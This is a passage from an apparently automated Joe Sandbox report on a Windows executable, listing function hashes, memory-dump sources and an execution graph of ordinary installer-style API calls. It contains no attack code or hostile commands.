                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 0ada6d7585ae9709d98b08fbd08e01cd3c63d5cd0dc02f0aeaf66522c8f6043c
                              • Instruction ID: dba9618e96cfc7eb210d45813e10725dbfa55c3724a841203e13622c8be3816f
                              • Opcode Fuzzy Hash: 0ada6d7585ae9709d98b08fbd08e01cd3c63d5cd0dc02f0aeaf66522c8f6043c
                              • Instruction Fuzzy Hash: 6911936371464486EF609A26D84036D7760A78ABF4F0443219B9E4BA95DF2DCD47E302
                              Function 00FAB6CC Relevance: 5.1, APIs: 4, Instructions: 54COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: memcmp
                              • String ID:
                              • API String ID: 1475443563-0
                              • Opcode ID: f196707fa33a710a6e46a40aea969b5deca21029894ce235fc118b4c4d1c3aaf
                              • Instruction ID: 4fe6e4eac27e0ecf1214d55bb090f474acca50ce9856ac295878690ff1720924
                              • Opcode Fuzzy Hash: f196707fa33a710a6e46a40aea969b5deca21029894ce235fc118b4c4d1c3aaf
                              • Instruction Fuzzy Hash: D001DEF230574641EB149F229E517B833269B5AFD4F884036CE098B706FFB8C951E304
                              Function 00FC6A08 Relevance: 5.1, APIs: 4, Instructions: 54COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: memcmp
                              • String ID:
                              • API String ID: 1475443563-0
                              • Opcode ID: d06369ecdc28b0a705b8f5a78abc2d88ad771fd5d20fed5fb0d2dce4f68be1b8
                              • Instruction ID: 9d032d349334fcfa54b51f8355a8ed6a76571faad498a97aaaf9e76c25068e04
                              • Opcode Fuzzy Hash: d06369ecdc28b0a705b8f5a78abc2d88ad771fd5d20fed5fb0d2dce4f68be1b8
                              • Instruction Fuzzy Hash: 0E0192B234974351EB149F269E42BB433669B19FD4F88903A8E059B305EF7CC956E304
                              Function 00F75FB0 Relevance: 5.1, APIs: 4, Instructions: 53COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 813d90adbe70e94906d70a422908a3570b15f95030edf62c32f227ae548bc4b6
                              • Instruction ID: a12ea0fa6fd6a56ca64368ca21d4924aee39e492fe753c1d10dcb2c40de639bb
                              • Opcode Fuzzy Hash: 813d90adbe70e94906d70a422908a3570b15f95030edf62c32f227ae548bc4b6
                              • Instruction Fuzzy Hash: 1001B563710E89859661BD57AC9052A6614AB05FF9B1D8117EE2C4B340DF7AC8529311
                              Function 00F99930 Relevance: 5.0, APIs: 4, Instructions: 35COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 7b4fba1c380075a19085162e6bd658fea28b4ac5520fde6bbe94776417234c12
                              • Instruction ID: cd9c6194a9127603abc2395bd0dd504fc69e4f7ef4ee058ecad08a794eb3be24
                              • Opcode Fuzzy Hash: 7b4fba1c380075a19085162e6bd658fea28b4ac5520fde6bbe94776417234c12
                              • Instruction Fuzzy Hash: 22F0BB53B01648489B90AE2BDC9016C63109F95BF8B5D413AEF0D0B344DE55CC929350
                              Function 00F98E64 Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 8d8b0820cca602ebf3b2a962fd6fd47eb7f6280dff4f65e24150de5827f7fc7a
                              • Instruction ID: 3edc1678bbdcea0492af2027cd4565182ed5aba44f0bd2ae8903a918ae40678f
                              • Opcode Fuzzy Hash: 8d8b0820cca602ebf3b2a962fd6fd47eb7f6280dff4f65e24150de5827f7fc7a
                              • Instruction Fuzzy Hash: B0F08913B0198485DB91BE27DC5116C63209B95FE5B5D85229F1D1F354DE3DCC52A311
                              Function 00FA03CC Relevance: 5.0, APIs: 4, Instructions: 15COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 11eeaecf133e82959a5403608a25ee7e2b55dc720599b072d793fea8b22b22c9
                              • Instruction ID: 945672704b5b2cc222f26cace28750e6829a66c973af69a8cf2299276651edb1
                              • Opcode Fuzzy Hash: 11eeaecf133e82959a5403608a25ee7e2b55dc720599b072d793fea8b22b22c9
                              • Instruction Fuzzy Hash: 5AD0671260050A80CBD4EB76DCA202C2320DBD9F88B549013AA0E9F215CD1ECCA3E3A2

                              Execution Graph

                              Execution Coverage:34.9%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:10%
                              Total number of Nodes:1344
                              Total number of Limit Nodes:42
                              execution_graph 2913 4015c1 2932 402da6 2913->2932 2917 401631 2919 401663 2917->2919 2920 401636 2917->2920 2922 401423 24 API calls 2919->2922 2956 401423 2920->2956 2929 40165b 2922->2929 2927 40164a SetCurrentDirectoryW 2927->2929 2928 401617 GetFileAttributesW 2930 4015d1 2928->2930 2930->2917 2930->2928 2944 405e39 2930->2944 2948 405b08 2930->2948 2951 405a6e CreateDirectoryW 2930->2951 2960 405aeb CreateDirectoryW 2930->2960 2933 402db2 2932->2933 2963 40657a 2933->2963 2936 4015c8 2938 405eb7 CharNextW CharNextW 2936->2938 2939 405ed4 2938->2939 2942 405ee6 2938->2942 2941 405ee1 CharNextW 2939->2941 2939->2942 2940 405f0a 2940->2930 2941->2940 2942->2940 2943 405e39 CharNextW 2942->2943 2943->2942 2945 405e3f 2944->2945 2946 405e55 2945->2946 2947 405e46 CharNextW 2945->2947 2946->2930 2947->2945 3001 40690a GetModuleHandleA 2948->3001 2952 405abb 2951->2952 2953 405abf GetLastError 2951->2953 2952->2930 2953->2952 2954 405ace SetFileSecurityW 2953->2954 2954->2952 2955 405ae4 GetLastError 2954->2955 2955->2952 3010 40559f 2956->3010 2959 40653d lstrcpynW 2959->2927 2961 405afb 2960->2961 2962 405aff GetLastError 2960->2962 2961->2930 2962->2961 2967 406587 2963->2967 2964 4067aa 2965 402dd3 2964->2965 2996 40653d lstrcpynW 2964->2996 2965->2936 2980 4067c4 2965->2980 2967->2964 2968 406778 lstrlenW 2967->2968 2971 40657a 10 API calls 2967->2971 2972 40668f GetSystemDirectoryW 2967->2972 2974 4066a2 GetWindowsDirectoryW 2967->2974 2975 406719 lstrcatW 2967->2975 2976 40657a 10 API calls 2967->2976 2977 4067c4 5 API calls 2967->2977 2978 4066d1 SHGetSpecialFolderLocation 2967->2978 2989 40640b 2967->2989 2994 406484 wsprintfW 2967->2994 2995 40653d lstrcpynW 2967->2995 2968->2967 2971->2968 2972->2967 2974->2967 2975->2967 2976->2967 2977->2967 2978->2967 2979 4066e9 SHGetPathFromIDListW CoTaskMemFree 2978->2979 2979->2967 2986 4067d1 2980->2986 2981 406847 2982 40684c CharPrevW 2981->2982 2984 40686d 2981->2984 2982->2981 2983 40683a CharNextW 2983->2981 2983->2986 2984->2936 2985 405e39 CharNextW 2985->2986 2986->2981 2986->2983 2986->2985 2987 406826 CharNextW 2986->2987 2988 406835 CharNextW 2986->2988 2987->2986 2988->2983 2997 4063aa 2989->2997 2992 40646f 2992->2967 2993 40643f RegQueryValueExW RegCloseKey 2993->2992 2994->2967 2995->2967 2996->2965 2998 4063b9 2997->2998 2999 4063c2 RegOpenKeyExW 2998->2999 3000 4063bd 2998->3000 2999->3000 3000->2992 3000->2993 3002 406930 GetProcAddress 3001->3002 3003 406926 3001->3003 3005 405b0f 3002->3005 3007 40689a GetSystemDirectoryW 3003->3007 3005->2930 3006 40692c 3006->3002 3006->3005 3008 4068bc wsprintfW LoadLibraryExW 3007->3008 3008->3006 3011 4055ba 3010->3011 3020 401431 3010->3020 3012 4055d6 lstrlenW 3011->3012 3013 40657a 17 API calls 3011->3013 3014 4055e4 lstrlenW 3012->3014 3015 4055ff 3012->3015 3013->3012 3016 4055f6 lstrcatW 3014->3016 3014->3020 3017 405612 3015->3017 3018 405605 SetWindowTextW 3015->3018 3016->3015 3019 405618 SendMessageW SendMessageW SendMessageW 3017->3019 3017->3020 3018->3017 3019->3020 3020->2959 3021 401941 3022 401943 3021->3022 3023 402da6 17 API calls 3022->3023 3024 401948 3023->3024 3027 405c49 3024->3027 3063 405f14 3027->3063 3030 405c71 DeleteFileW 3061 401951 3030->3061 3031 405c88 3032 405da8 3031->3032 3077 40653d lstrcpynW 3031->3077 3032->3061 3095 406873 FindFirstFileW 3032->3095 3034 405cae 3035 405cc1 3034->3035 3036 405cb4 lstrcatW 3034->3036 3078 405e58 lstrlenW 3035->3078 3038 405cc7 3036->3038 3040 405cd7 lstrcatW 3038->3040 3042 405ce2 lstrlenW FindFirstFileW 3038->3042 3040->3042 3042->3032 3054 405d04 3042->3054 3045 405d8b FindNextFileW 3049 405da1 FindClose 3045->3049 3045->3054 3046 405c01 5 API calls 3048 405de3 3046->3048 3050 405de7 3048->3050 3051 405dfd 3048->3051 3049->3032 3055 40559f 24 API calls 3050->3055 3050->3061 3053 40559f 24 API calls 3051->3053 3053->3061 3054->3045 3056 405c49 60 API calls 3054->3056 3058 40559f 24 API calls 3054->3058 3060 40559f 24 API calls 3054->3060 3082 40653d lstrcpynW 3054->3082 3083 405c01 3054->3083 3091 4062fd MoveFileExW 3054->3091 3057 405df4 3055->3057 3056->3054 3059 4062fd 36 API calls 3057->3059 3058->3045 3059->3061 3060->3054 3101 40653d lstrcpynW 3063->3101 3065 405f25 3066 405eb7 4 API calls 3065->3066 3067 405f2b 3066->3067 3068 405c69 3067->3068 3069 4067c4 5 API calls 3067->3069 3068->3030 3068->3031 3075 405f3b 3069->3075 3070 405f6c lstrlenW 3071 405f77 3070->3071 3070->3075 3073 405e0c 3 API calls 3071->3073 3072 406873 2 API calls 3072->3075 3074 405f7c GetFileAttributesW 3073->3074 3074->3068 3075->3068 3075->3070 3075->3072 3076 405e58 2 API calls 3075->3076 3076->3070 3077->3034 3079 405e66 3078->3079 3080 405e78 3079->3080 3081 405e6c CharPrevW 3079->3081 3080->3038 3081->3079 3081->3080 3082->3054 3102 406008 GetFileAttributesW 3083->3102 3086 405c2e 3086->3054 3087 405c24 DeleteFileW 3089 405c2a 3087->3089 3088 405c1c RemoveDirectoryW 3088->3089 3089->3086 3090 405c3a SetFileAttributesW 3089->3090 3090->3086 3092 40631e 3091->3092 3093 406311 3091->3093 3092->3054 3105 406183 3093->3105 3096 405dcd 3095->3096 3097 406889 FindClose 3095->3097 3096->3061 3098 405e0c lstrlenW CharPrevW 3096->3098 3097->3096 3099 405dd7 3098->3099 3100 405e28 lstrcatW 3098->3100 3099->3046 3100->3099 3101->3065 3103 405c0d 3102->3103 3104 40601a SetFileAttributesW 3102->3104 3103->3086 3103->3087 3103->3088 3104->3103 3106 4061b3 3105->3106 3107 4061d9 GetShortPathNameW 3105->3107 3132 40602d GetFileAttributesW CreateFileW 3106->3132 3108 4062f8 3107->3108 3109 4061ee 3107->3109 3108->3092 3109->3108 3112 4061f6 wsprintfA 3109->3112 3111 4061bd CloseHandle GetShortPathNameW 3111->3108 3113 4061d1 3111->3113 3114 40657a 17 API calls 3112->3114 3113->3107 3113->3108 3115 40621e 3114->3115 3133 40602d GetFileAttributesW CreateFileW 3115->3133 3117 40622b 3117->3108 3118 40623a GetFileSize GlobalAlloc 3117->3118 3119 4062f1 CloseHandle 3118->3119 3120 40625c 3118->3120 3119->3108 3134 4060b0 ReadFile 3120->3134 3125 40627b lstrcpyA 3128 40629d 3125->3128 3126 40628f 3127 405f92 4 API calls 3126->3127 3127->3128 3129 4062d4 SetFilePointer 3128->3129 3141 4060df WriteFile 3129->3141 3132->3111 3133->3117 3135 4060ce 3134->3135 3135->3119 3136 405f92 lstrlenA 3135->3136 3137 405fd3 lstrlenA 3136->3137 3138 405fdb 3137->3138 3139 405fac lstrcmpiA 3137->3139 3138->3125 3138->3126 3139->3138 3140 405fca CharNextA 3139->3140 3140->3137 3142 4060fd GlobalFree 3141->3142 3142->3119 3143 401c43 3165 402d84 3143->3165 3145 401c4a 3146 402d84 17 API calls 3145->3146 3147 401c57 3146->3147 3148 401c6c 3147->3148 3149 402da6 17 API calls 3147->3149 3150 401c7c 3148->3150 3151 402da6 17 API calls 3148->3151 3149->3148 3152 401cd3 3150->3152 3153 401c87 3150->3153 3151->3150 3155 402da6 17 API calls 3152->3155 3154 402d84 17 API calls 3153->3154 3157 401c8c 3154->3157 3156 401cd8 3155->3156 3158 402da6 17 API calls 3156->3158 3159 402d84 17 API calls 3157->3159 3160 401ce1 FindWindowExW 3158->3160 3161 401c98 3159->3161 3164 401d03 3160->3164 3162 401cc3 SendMessageW 3161->3162 3163 401ca5 SendMessageTimeoutW 3161->3163 3162->3164 3163->3164 3166 40657a 17 API calls 3165->3166 3167 402d99 3166->3167 3167->3145 3975 404943 3976 404953 3975->3976 3977 404979 3975->3977 3978 404499 18 API calls 3976->3978 3979 404500 8 API calls 3977->3979 3980 404960 SetDlgItemTextW 3978->3980 3981 404985 3979->3981 3980->3977 3982 4028c4 3983 4028ca 3982->3983 3984 4028d2 FindClose 3983->3984 3985 402c2a 3983->3985 3984->3985 3989 4016cc 3990 402da6 17 API calls 3989->3990 3991 4016d2 GetFullPathNameW 3990->3991 3992 4016ec 3991->3992 3998 40170e 3991->3998 3995 406873 2 API calls 3992->3995 3992->3998 3993 401723 GetShortPathNameW 3994 402c2a 3993->3994 3996 4016fe 3995->3996 3996->3998 3999 40653d lstrcpynW 3996->3999 3998->3993 3998->3994 3999->3998 4000 401e4e GetDC 4001 402d84 17 API calls 4000->4001 4002 401e60 GetDeviceCaps MulDiv ReleaseDC 4001->4002 4003 402d84 17 API calls 4002->4003 4004 401e91 4003->4004 4005 40657a 17 API calls 4004->4005 4006 401ece CreateFontIndirectW 4005->4006 4007 402638 4006->4007 4008 4045cf lstrcpynW lstrlenW 3675 402950 3676 402da6 17 API calls 3675->3676 3678 40295c 3676->3678 3677 402972 3680 406008 2 API calls 3677->3680 3678->3677 3679 402da6 17 API calls 3678->3679 3679->3677 3681 402978 3680->3681 3703 40602d GetFileAttributesW CreateFileW 3681->3703 3683 402985 3684 402a3b 3683->3684 3685 4029a0 GlobalAlloc 3683->3685 3686 402a23 3683->3686 3687 402a42 DeleteFileW 3684->3687 3688 402a55 3684->3688 3685->3686 3689 4029b9 3685->3689 3690 4032b4 31 API calls 3686->3690 3687->3688 3704 4034e5 SetFilePointer 3689->3704 3692 402a30 CloseHandle 3690->3692 3692->3684 3693 4029bf 3694 4034cf ReadFile 3693->3694 3695 4029c8 GlobalAlloc 3694->3695 3696 4029d8 3695->3696 3697 402a0c 3695->3697 3698 4032b4 31 API calls 3696->3698 3699 4060df WriteFile 3697->3699 3702 4029e5 3698->3702 3700 402a18 GlobalFree 3699->3700 3700->3686 3701 402a03 GlobalFree 3701->3697 3702->3701 3703->3683 3704->3693 4009 401956 4010 402da6 17 API calls 4009->4010 4011 40195d lstrlenW 4010->4011 4012 402638 4011->4012 3769 4014d7 3770 402d84 17 API calls 3769->3770 3771 4014dd Sleep 3770->3771 3773 402c2a 3771->3773 3774 4020d8 3775 4020ea 3774->3775 3785 40219c 3774->3785 3776 402da6 17 API calls 3775->3776 3778 4020f1 3776->3778 3777 401423 24 API calls 3783 4022f6 3777->3783 3779 402da6 17 API calls 3778->3779 3780 4020fa 3779->3780 3781 402110 LoadLibraryExW 3780->3781 3782 402102 GetModuleHandleW 3780->3782 3784 402121 3781->3784 3781->3785 3782->3781 3782->3784 3796 406979 3784->3796 3785->3777 3788 402132 3791 402151 KiUserCallbackDispatcher 3788->3791 3792 40213a 3788->3792 3789 40216b 3790 40559f 24 API calls 3789->3790 3794 402142 3790->3794 3791->3794 3793 401423 24 API calls 3792->3793 3793->3794 3794->3783 3795 40218e FreeLibrary 3794->3795 3795->3783 3801 40655f WideCharToMultiByte 3796->3801 3798 406996 3799 40699d GetProcAddress 3798->3799 3800 40212c 3798->3800 3799->3800 3800->3788 3800->3789 3801->3798 4013 404658 4014 404670 4013->4014 4020 40478a 4013->4020 4021 404499 18 API calls 4014->4021 4015 4047f4 4016 4048be 4015->4016 4017 4047fe GetDlgItem 4015->4017 4022 404500 8 API calls 4016->4022 4018 404818 4017->4018 4019 40487f 4017->4019 4018->4019 4026 40483e SendMessageW LoadCursorW SetCursor 4018->4026 4019->4016 4027 404891 4019->4027 4020->4015 4020->4016 4023 4047c5 GetDlgItem SendMessageW 4020->4023 4024 4046d7 4021->4024 4025 4048b9 4022->4025 4046 4044bb KiUserCallbackDispatcher 4023->4046 4029 404499 18 API calls 4024->4029 4050 404907 4026->4050 4032 4048a7 4027->4032 4033 404897 SendMessageW 4027->4033 4030 4046e4 CheckDlgButton 4029->4030 4044 4044bb KiUserCallbackDispatcher 4030->4044 4032->4025 4037 4048ad SendMessageW 4032->4037 4033->4032 4034 4047ef 4047 4048e3 4034->4047 4037->4025 4039 404702 GetDlgItem 4045 4044ce SendMessageW 4039->4045 4041 404718 SendMessageW 4042 404735 GetSysColor 4041->4042 4043 40473e SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4041->4043 4042->4043 4043->4025 4044->4039 4045->4041 4046->4034 4048 4048f1 4047->4048 4049 4048f6 SendMessageW 4047->4049 4048->4049 4049->4015 4053 405b63 ShellExecuteExW 4050->4053 4052 40486d LoadCursorW SetCursor 4052->4019 4053->4052 4054 402b59 4055 402b60 4054->4055 4056 402bab 4054->4056 4059 402d84 17 API calls 4055->4059 4062 402ba9 4055->4062 4057 40690a 5 API calls 4056->4057 4058 402bb2 4057->4058 4060 402da6 17 API calls 4058->4060 4061 402b6e 4059->4061 4063 402bbb 4060->4063 4064 402d84 17 API calls 4061->4064 4063->4062 4065 402bbf IIDFromString 4063->4065 4067 402b7a 4064->4067 4065->4062 4066 402bce 4065->4066 4066->4062 4072 40653d lstrcpynW 4066->4072 4071 406484 wsprintfW 4067->4071 4070 402beb CoTaskMemFree 4070->4062 4071->4062 4072->4070 3902 40175c 3903 402da6 17 API calls 3902->3903 3904 401763 3903->3904 3905 40605c 2 API calls 3904->3905 3906 40176a 3905->3906 3907 40605c 2 API calls 3906->3907 3907->3906 4073 401d5d 4074 402d84 17 API calls 4073->4074 4075 401d6e SetWindowLongW 4074->4075 4076 402c2a 4075->4076 3908 4028de 3909 4028e6 3908->3909 3910 4028ea FindNextFileW 3909->3910 3913 4028fc 3909->3913 3911 402943 3910->3911 3910->3913 3914 40653d lstrcpynW 3911->3914 3914->3913 3915 4056de 3916 405888 3915->3916 3917 4056ff GetDlgItem GetDlgItem GetDlgItem 3915->3917 3919 405891 GetDlgItem CreateThread CloseHandle 3916->3919 3920 4058b9 3916->3920 3960 4044ce SendMessageW 3917->3960 3919->3920 3963 405672 5 API calls 3919->3963 3922 4058e4 3920->3922 3923 4058d0 ShowWindow ShowWindow 3920->3923 3924 405909 3920->3924 3921 40576f 3929 405776 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3921->3929 3925 405944 3922->3925 3926 4058f8 3922->3926 3927 40591e ShowWindow 3922->3927 3962 4044ce SendMessageW 3923->3962 3928 404500 8 API calls 3924->3928 3925->3924 3937 405952 SendMessageW 3925->3937 3931 404472 SendMessageW 3926->3931 3933 405930 3927->3933 3934 40593e 3927->3934 3932 405917 3928->3932 3935 4057e4 3929->3935 3936 4057c8 SendMessageW SendMessageW 3929->3936 3931->3924 3938 40559f 24 API calls 3933->3938 3939 404472 SendMessageW 3934->3939 3940 4057f7 3935->3940 3941 4057e9 SendMessageW 3935->3941 3936->3935 3937->3932 3942 40596b CreatePopupMenu 3937->3942 3938->3934 3939->3925 3944 404499 18 API calls 3940->3944 3941->3940 3943 40657a 17 API calls 3942->3943 3946 40597b AppendMenuW 3943->3946 3945 405807 3944->3945 3949 405810 ShowWindow 3945->3949 3950 405844 GetDlgItem SendMessageW 3945->3950 3947 405998 GetWindowRect 3946->3947 3948 4059ab TrackPopupMenu 3946->3948 3947->3948 3948->3932 3951 4059c6 3948->3951 3952 405833 3949->3952 3953 405826 ShowWindow 3949->3953 3950->3932 3954 40586b SendMessageW SendMessageW 3950->3954 3955 4059e2 SendMessageW 3951->3955 3961 4044ce SendMessageW 3952->3961 3953->3952 3954->3932 3955->3955 3956 4059ff OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3955->3956 3958 405a24 SendMessageW 3956->3958 3958->3958 3959 405a4d GlobalUnlock SetClipboardData CloseClipboard 3958->3959 3959->3932 3960->3921 3961->3950 3962->3922 4077 404ce0 4078 404cf0 4077->4078 4079 404d0c 4077->4079 4088 405b81 GetDlgItemTextW 4078->4088 4081 404d12 SHGetPathFromIDListW 4079->4081 4082 404d3f 4079->4082 4084 404d22 4081->4084 4087 404d29 SendMessageW 4081->4087 4083 404cfd SendMessageW 4083->4079 4085 40140b 2 API calls 4084->4085 4085->4087 4087->4082 4088->4083 4089 401563 4090 402ba4 4089->4090 4093 406484 wsprintfW 4090->4093 4092 402ba9 4093->4092 4094 401968 4095 402d84 17 API calls 4094->4095 4096 40196f 4095->4096 4097 402d84 17 API calls 4096->4097 4098 40197c 4097->4098 4099 402da6 17 API calls 4098->4099 4100 401993 lstrlenW 4099->4100 4101 4019a4 4100->4101 4105 4019e5 4101->4105 4106 40653d lstrcpynW 4101->4106 4103 4019d5 4104 4019da lstrlenW 4103->4104 4103->4105 4104->4105 4106->4103 4107 40166a 4108 402da6 17 API calls 4107->4108 4109 401670 4108->4109 4110 406873 2 API calls 4109->4110 4111 401676 4110->4111 4112 402aeb 4113 402d84 17 API calls 4112->4113 4114 402af1 4113->4114 4115 40657a 17 API calls 4114->4115 4116 40292e 4114->4116 4115->4116 4117 4026ec 4118 402d84 17 API calls 4117->4118 4125 4026fb 4118->4125 4119 402838 4120 402745 ReadFile 4120->4119 4120->4125 4121 4060b0 ReadFile 4121->4125 4123 402785 MultiByteToWideChar 4123->4125 4124 40283a 4139 406484 wsprintfW 4124->4139 4125->4119 4125->4120 4125->4121 4125->4123 4125->4124 4127 4027ab SetFilePointer MultiByteToWideChar 4125->4127 4128 40284b 4125->4128 4130 40610e SetFilePointer 4125->4130 4127->4125 4128->4119 4129 40286c SetFilePointer 4128->4129 4129->4119 4131 40612a 4130->4131 4134 406142 4130->4134 4132 4060b0 ReadFile 4131->4132 4133 406136 4132->4133 4133->4134 4135 406173 SetFilePointer 4133->4135 4136 40614b SetFilePointer 4133->4136 4134->4125 4135->4134 4136->4135 4137 406156 4136->4137 4138 4060df WriteFile 4137->4138 4138->4134 4139->4119 3634 40176f 3635 402da6 17 API calls 3634->3635 3636 401776 3635->3636 3637 401796 3636->3637 3638 40179e 3636->3638 3673 40653d lstrcpynW 3637->3673 3674 40653d lstrcpynW 3638->3674 3641 40179c 3645 4067c4 5 API calls 3641->3645 3642 4017a9 3643 405e0c 3 API calls 3642->3643 3644 4017af lstrcatW 3643->3644 3644->3641 3662 4017bb 3645->3662 3646 406873 2 API calls 3646->3662 3647 406008 2 API calls 3647->3662 3649 4017cd CompareFileTime 3649->3662 3650 40188d 3652 40559f 24 API calls 3650->3652 3651 401864 3653 40559f 24 API calls 3651->3653 3657 401879 3651->3657 3655 401897 3652->3655 3653->3657 3654 40653d lstrcpynW 3654->3662 3656 4032b4 31 API calls 3655->3656 3658 4018aa 3656->3658 3659 4018be SetFileTime 3658->3659 3660 4018d0 CloseHandle 3658->3660 3659->3660 3660->3657 3663 4018e1 3660->3663 3661 40657a 17 API calls 3661->3662 3662->3646 3662->3647 3662->3649 3662->3650 3662->3651 3662->3654 3662->3661 3668 405b9d MessageBoxIndirectW 3662->3668 3672 40602d GetFileAttributesW CreateFileW 3662->3672 3664 4018e6 3663->3664 3665 4018f9 3663->3665 3666 40657a 17 API calls 3664->3666 3667 40657a 17 API calls 3665->3667 3669 4018ee lstrcatW 3666->3669 3670 401901 3667->3670 3668->3662 3669->3670 3671 405b9d MessageBoxIndirectW 3670->3671 3671->3657 3672->3662 3673->3641 3674->3642 4140 401a72 4141 402d84 17 API calls 4140->4141 4142 401a7b 4141->4142 4143 402d84 17 API calls 4142->4143 4144 401a20 4143->4144 4145 401573 4146 401583 ShowWindow 4145->4146 4147 40158c 4145->4147 4146->4147 4148 402c2a 4147->4148 4149 40159a ShowWindow 4147->4149 4149->4148 4150 4023f4 4151 402da6 17 API calls 4150->4151 4152 402403 4151->4152 4153 402da6 17 API calls 4152->4153 4154 40240c 4153->4154 4155 402da6 17 API calls 4154->4155 4156 402416 GetPrivateProfileStringW 4155->4156 4157 4014f5 SetForegroundWindow 4158 402c2a 4157->4158 4159 401ff6 4160 402da6 17 API calls 4159->4160 4161 401ffd 4160->4161 4162 406873 2 API calls 4161->4162 4163 402003 4162->4163 4165 402014 4163->4165 4166 406484 wsprintfW 4163->4166 4166->4165 4167 401b77 4168 402da6 17 API calls 4167->4168 4169 401b7e 4168->4169 4170 402d84 17 API calls 4169->4170 4171 401b87 wsprintfW 4170->4171 4172 402c2a 4171->4172 4173 40167b 4174 